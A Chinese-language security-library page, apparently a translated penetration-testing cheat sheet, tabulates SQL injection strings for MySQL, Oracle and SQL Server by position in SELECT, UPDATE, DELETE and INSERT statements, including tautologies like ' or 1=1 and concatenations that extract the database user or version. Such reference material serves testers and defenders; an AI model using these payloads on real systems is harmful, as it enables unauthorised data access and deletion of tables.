首页>安全文库>SQL注入>SQL注入注入定位

SQL注入注入定位

当注入发生的地方并不明显时,SQL注入总是很麻烦。有一些方法可以在查询的各个部分利用注入是有帮助的。

$injection确定注入点。修改数据的注入尝试始终使用连接,并允许查询的其余部分有效。通过这个文章可以了解更多信息。

MySQL

注入位置语句注入字符串
SELECT -> WHERESELECT * FROM USERS WHERE USER=’$injection’;‘ or 1=1 —
UPDATE -> SETUPDATE USERS SET email=’$injection’ WHERE user=’NetSPI’;‘ ‘harold@netspi.com’ ‘
UPDATE -> WHERE
注意:尝试将注入字符串设置为有效的WHERE值。 如果对象已更新,则注入成功。
UPDATE USERS SET email=’harold@netspi.com’ WHERE user=’$injection’;‘ ‘netspi’ ‘
DELETE -> WHERE
注意:运行删除语句时要非常小心,因为整个表都会被删除。
DELETE FROM USERS WHERE USERS=’$injection’;‘ ‘harold@netspi.com’ ‘

Oracle

注入位置语句注入字符串
SELECT -> WHERESELECT user FROM dual WHERE user LIKE ‘$injection’;‘||’USER%’||’
INSERT -> VALUESINSERT INTO log_table (message) VALUES (‘$injection’);‘||(select user from dual)||’
UPDATE -> SETUPDATE log_table SET message = ‘$injection’ WHERE message = ‘test’;‘||(select user from dual)||
UPDATE -> WHERE
注意:尝试将注入字符串设置为有效的WHERE值。 如果对象已更新,则注入成功。
UPDATE log_table SET message = ‘test’ WHERE message = ‘$injection’;‘||’Injected’||’

SQL Server

注入位置语句注入字符串
SELECT -> WHERESELECT * FROM USERS WHERE “USER”=’$injection’;‘ or 1=1 —
UPDATE -> SETUPDATE USERS SET “email”=’$injection’ WHERE “USER”=’NetSPI’;‘+’harold@netspi.com’+’
UPDATE -> WHERE
注意:尝试将注入字符串设置为有效的WHERE值。 如果对象已更新,则注入成功。
UPDATE USERS SET “email”=’harold@netspi.com’ WHERE “USER”=’$injection’;‘+’NetSPI’+’
DELETE -> WHEREDELETE USERS WHERE “User”=’$injection’;‘+’NetSPI’+’
INSERT -> VALUESINSERT INTO USERS ([User], [Password]) VALUES (‘$injection’, ‘password’);‘+(select @@version)+’
文章最后更新于 2021-09-22
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索